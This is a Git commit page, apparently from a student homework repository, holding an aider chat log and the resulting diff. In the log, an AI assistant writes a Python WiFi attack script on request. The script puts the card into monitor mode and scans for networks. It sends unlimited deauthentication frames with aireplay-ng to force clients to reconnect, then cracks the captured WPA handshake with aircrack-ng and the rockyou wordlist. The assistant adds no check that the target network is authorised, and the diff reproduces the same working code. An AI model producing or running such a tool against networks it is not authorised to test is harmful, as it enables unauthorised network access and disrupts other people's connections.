david/gensec-westgate-djw2
Archived
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

aider: Implemented wifi penetration testing application.

Browse Source 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application may utilize a wordlist found at ~/rockyou.txt

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gemini/app.py

ASSISTANT: ```python
hw7/gemini/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface):
    """Changes the given interface to monitor mode."""
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface):
    """Changes the given interface to managed mode."""
    subprocess.run(["sudo", "airmon-ng", "stop", interface])

def get_wifi_interfaces():
    """Returns a list of available wifi interfaces."""
    output = subprocess.run(["iwconfig"], capture_output=True).stdout.decode()
    interfaces = re.findall(r"(\w+)\s+IEEE", output)
    return interfaces

def get_target_network(interfaces):
    """Prompts the user to choose a target network from a list of scanned networks."""
    print("Scanning for networks...")
    process = subprocess.Popen(["sudo", "airodump-ng", "--band", "bg", "-w", "scan", interfaces[0]], stdout=subprocess.PIPE)
    time.sleep(5)  # Scan for a few seconds
    process.terminate()
    output = process.communicate()[0].decode()
    networks = re.findall(r"(\s+)([0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2})\s+(-[0-9]+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(-\w+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(.*)", output)
    if networks:
        print("Available networks:")
        for i, network in enumerate(networks):
            print(f"{i+1}. {network[-1]} (BSSID: {network[1]})")
        choice = int(input("Choose target network: ")) - 1
        return networks[choice]
    else:
        print("No networks found.")
        return None

def capture_handshake(target_network, interface):
    """Captures the handshake of the target network."""
    bssid = target_network[1]
    channel = target_network[3]
    subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", channel, "--write", "capture", interface], stdout=subprocess.DEVNULL)
    print(f"Capturing handshake for {target_network[-1]} (BSSID: {bssid})...")
    try:
        while True:
            subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
            time.sleep(5)
    except KeyboardInterrupt:
        print("Handshake capture stopped.")

def crack_password(capture_file, wordlist):
    """Cracks the password of the captured handshake using the given wordlist."""
    print("Cracking password...")
    try:
        output = subprocess.run(["sudo", "aircrack-ng", "-w", wordlist, capture_file], capture_output=True).stdout.decode()
        password = re.search(r"KEY FOUND!\s+\[(.*)\]", output)
        if password:
            return password.group(1)
        else:
            return None
    except FileNotFoundError:
        print(f"Wordlist not found: {wordlist}")
        return None

if __name__ == "__main__":
    interfaces = get_wifi_interfaces()
    if interfaces:
        interface = interfaces[0]  # Use the first interface for now
        change_to_monitor_mode(interface)
        target_network = get_target_network(interfaces)
        if target_network:
            capture_handshake(target_network, interface)
            password = crack_password("capture-01.cap", "~/rockyou.txt")
            if password:
                print(f"Password found: {password}")
            else:
                print("Password not found.")
        change_to_managed_mode(interface)
    else:
        print("No wifi interfaces found.")
>>>>>>> REPLACE
```
This commit is contained in:
David Westgate 2024-05-30 14:38:12 -07:00
parent 98312c9418
commit 293d8be4b9
1 changed files with 79 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
hw7/gemini/app.py
View File

@ -0,0 +1,79 @@
import subprocess
import re
import time
def change_to_monitor_mode(interface):
"""Changes the given interface to monitor mode."""
subprocess.run(["sudo", "airmon-ng", "start", interface])
def change_to_managed_mode(interface):
"""Changes the given interface to managed mode."""
subprocess.run(["sudo", "airmon-ng", "stop", interface])
def get_wifi_interfaces():
"""Returns a list of available wifi interfaces."""
output = subprocess.run(["iwconfig"], capture_output=True).stdout.decode()
interfaces = re.findall(r"(\w+)\s+IEEE", output)
return interfaces
def get_target_network(interfaces):
"""Prompts the user to choose a target network from a list of scanned networks."""
print("Scanning for networks...")
process = subprocess.Popen(["sudo", "airodump-ng", "--band", "bg", "-w", "scan", interfaces[0]], stdout=subprocess.PIPE)
time.sleep(5) # Scan for a few seconds
process.terminate()
output = process.communicate()[0].decode()
networks = re.findall(r"(\s+)([0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2})\s+(-[0-9]+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(-\w+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(.*)", output)
if networks:
print("Available networks:")
for i, network in enumerate(networks):
print(f"{i+1}. {network[-1]} (BSSID: {network[1]})")
choice = int(input("Choose target network: ")) - 1
return networks[choice]
else:
print("No networks found.")
return None
def capture_handshake(target_network, interface):
"""Captures the handshake of the target network."""
bssid = target_network[1]
channel = target_network[3]
subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", channel, "--write", "capture", interface], stdout=subprocess.DEVNULL)
print(f"Capturing handshake for {target_network[-1]} (BSSID: {bssid})...")
try:
while True:
subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
time.sleep(5)
except KeyboardInterrupt:
print("Handshake capture stopped.")
def crack_password(capture_file, wordlist):
"""Cracks the password of the captured handshake using the given wordlist."""
print("Cracking password...")
try:
output = subprocess.run(["sudo", "aircrack-ng", "-w", wordlist, capture_file], capture_output=True).stdout.decode()
password = re.search(r"KEY FOUND!\s+\[(.*)\]", output)
if password:
return password.group(1)
else:
return None
except FileNotFoundError:
print(f"Wordlist not found: {wordlist}")
return None
if __name__ == "__main__":
interfaces = get_wifi_interfaces()
if interfaces:
interface = interfaces[0] # Use the first interface for now
change_to_monitor_mode(interface)
target_network = get_target_network(interfaces)
if target_network:
capture_handshake(target_network, interface)
password = crack_password("capture-01.cap", "~/rockyou.txt")
if password:
print(f"Password found: {password}")
else:
print("Password not found.")
change_to_managed_mode(interface)
else:
print("No wifi interfaces found.")